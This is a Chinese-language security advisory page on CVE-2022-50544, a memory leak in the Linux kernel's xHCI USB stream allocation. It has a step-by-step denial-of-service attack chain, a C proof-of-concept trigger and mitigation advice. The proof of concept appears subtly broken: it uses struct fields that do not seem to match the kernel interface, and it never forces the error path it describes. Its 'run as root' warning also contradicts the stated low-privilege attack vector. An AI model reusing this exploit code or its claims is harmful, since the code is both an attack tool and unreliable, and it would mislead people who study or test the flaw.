CVE-2022-50544 Linux内核xHCI驱动内存泄漏漏洞

漏洞信息

漏洞编号

CVE-2022-50544

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

CVE-2022-50544是Linux内核USB主机控制器（xHCI）驱动中的一个内存泄漏漏洞。该漏洞位于xhci_alloc_stream_info()函数中，该函数负责为USB流（stream）分配流上下文数组。在分配stream_info->stream_ctx_array时，调用了xhci_alloc_stream_ctx()来分配内存。然而，当函数执行过程中发生错误时，已经分配的stream_info->stream_ctx_array资源没有被正确释放，导致内存泄漏问题长期存在。

该漏洞的CVSS评分为5.5，属于中危级别。其攻击向量为本地攻击（AV:L），需要低权限（PR:L），无需用户交互（UI:N）。虽然机密性和完整性影响较低，但可用性影响较高（A:H），意味着攻击者可以通过反复触发该错误路径来持续消耗系统内存资源，最终可能导致系统可用内存耗尽，引发系统性能下降甚至拒绝服务（DoS）。

此漏洞影响所有使用受影响版本Linux内核的系统，特别是在使用USB 3.0 xHCI主机控制器的环境中更为常见。该漏洞已在多个Linux内核稳定版本中得到修复，包括多个stable分支的补丁提交。修复方案是在错误处理路径中添加xhci_free_stream_ctx()调用，确保在异常情况下也能正确释放已分配的流上下文数组内存。

技术细节

从技术层面分析，该漏洞的根因在于xhci_alloc_stream_info()函数中的错误处理路径不完整。具体技术细节如下：

1. **漏洞位置**：xhci_alloc_stream_info()函数，定义在Linux内核的drivers/usb/host/xhci.c文件中。该函数用于为USB流传输分配流信息结构体。

2. **漏洞原理**：当调用xhci_alloc_stream_info()分配流信息时，函数内部会调用xhci_alloc_stream_ctx()来分配stream_info->stream_ctx_array指向的DMA一致性内存区域。如果在分配过程中后续步骤失败（例如DMA映射失败或其他资源分配错误），函数会跳转到错误处理标签处退出，但未释放已经成功分配的stream_ctx_array内存。

3. **利用方式**：攻击者可以通过编写特定的USB驱动或利用用户态USB设备操作接口，频繁触发流分配失败的条件。由于每次失败都会泄漏固定大小的内存（取决于流上下文数组的大小），攻击者可以通过持续触发该路径来耗尽系统的DMA内存池或内核内存。

4. **影响范围**：该漏洞影响Linux内核的多个版本，受影响的版本范围从引入该代码的版本开始，直至各个stable分支的修复版本。具体的修复补丁包括782c873f8e76、7e271f42a5cc、7fc6bab3413e、91271a3e772e和9fa81cbd2dd3等多个提交。

5. **修复方案**：在错误处理路径中增加xhci_free_stream_ctx(&stream_info->stream_ctx_array)调用，确保在任何退出路径上都能正确释放已分配的内存资源，避免内存泄漏。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在目标系统上拥有本地低权限账户，并连接一个支持批量流（Bulk Streams）的USB 3.0设备到运行受影响Linux内核的系统。

STEP 2

步骤2：触发流分配

通过USB设备文件系统接口（如USBDEVFS_ALLOCSTREAMS ioctl）发起流上下文分配请求，调用进入内核的xhci_alloc_stream_info()函数。

STEP 3

步骤3：制造错误条件

通过耗尽DMA内存池或其他资源分配限制，强制stream_ctx_array分配之后的步骤失败，使代码进入错误处理路径。

STEP 4

步骤4：内存泄漏累积

在错误处理路径中，由于缺少xhci_free_stream_ctx()调用，已分配的stream_ctx_array内存未被释放，造成内存泄漏。

STEP 5

步骤5：拒绝服务

攻击者反复执行上述步骤，持续消耗系统内存，最终导致内核内存耗尽，系统性能严重下降或完全不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2022-50544: Trigger memory leak in xhci_alloc_stream_info()
// This PoC demonstrates how to trigger the memory leak by repeatedly
// attempting to allocate USB streams and forcing error conditions.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <linux/usbdevice_fs.h>

// Simplified trigger: open a USB device and attempt stream allocation
// operations that may fail, causing the memory leak path to be exercised.
int trigger_memory_leak(const char *usb_device_path) {
    int fd;
    int ret;
    int iteration = 0;

    fd = open(usb_device_path, O_RDWR);
    if (fd < 0) {
        perror("Failed to open USB device");
        return -1;
    }

    // Repeatedly attempt operations that trigger xhci_alloc_stream_info()
    // In a real exploit, the attacker would need to:
    // 1. Have a USB device that supports bulk streams
    // 2. Issue USBDEVFS_ALLOCSTREAM or equivalent ioctl calls
    // 3. Force failures in the allocation path (e.g., via resource exhaustion)
    while (iteration < 1000) {
        struct usbdevfs_streams streams;

        // Attempt to allocate streams - this calls into xhci_alloc_stream_info()
        streams.urb_count = 1;  // Minimal stream count
        streams.streams = 0;

        ret = ioctl(fd, USBDEVFS_ALLOCSTREAMS, &streams);
        if (ret < 0 && errno != EBUSY) {
            // Error path triggered - memory leak occurs here
            fprintf(stderr, "Iteration %d: ioctl failed (expected for PoC): %s\n",
                    iteration, strerror(errno));
        }
        iteration++;
    }

    close(fd);
    printf("PoC completed. Check kernel memory usage for leaks.\n");
    return 0;
}

int main(int argc, char *argv[]) {
    const char *dev_path = "/dev/bus/usb/001/001";

    if (argc > 1) {
        dev_path = argv[1];
    }

    printf("CVE-2022-50544 PoC - xhci memory leak trigger\n");
    printf("Target device: %s\n", dev_path);
    printf("WARNING: Run as root with a USB device that supports bulk streams\n\n");

    return trigger_memory_leak(dev_path);
}

影响范围

Linux Kernel < 5.10.150 (stable分支修复)

Linux Kernel < 5.15.75 (stable分支修复)

Linux Kernel < 5.19.17 (stable分支修复)

Linux Kernel < 6.0.3 (stable分支修复)

所有引入xhci_alloc_stream_info()函数至修复版本之间的Linux内核版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以采取以下临时缓解措施：1）限制普通用户对USB设备的访问权限，通过udev规则限制特定设备的访问；2）禁用USB大容量存储和其他可能触发流分配的设备类型；3）监控系统内存使用，设置内存使用阈值告警；4）使用cgroups限制单个用户进程可使用的内存上限，防止单个攻击者耗尽系统内存；5）如果不需要USB 3.0流功能，可以在内核配置中禁用相关的xHCI流支持。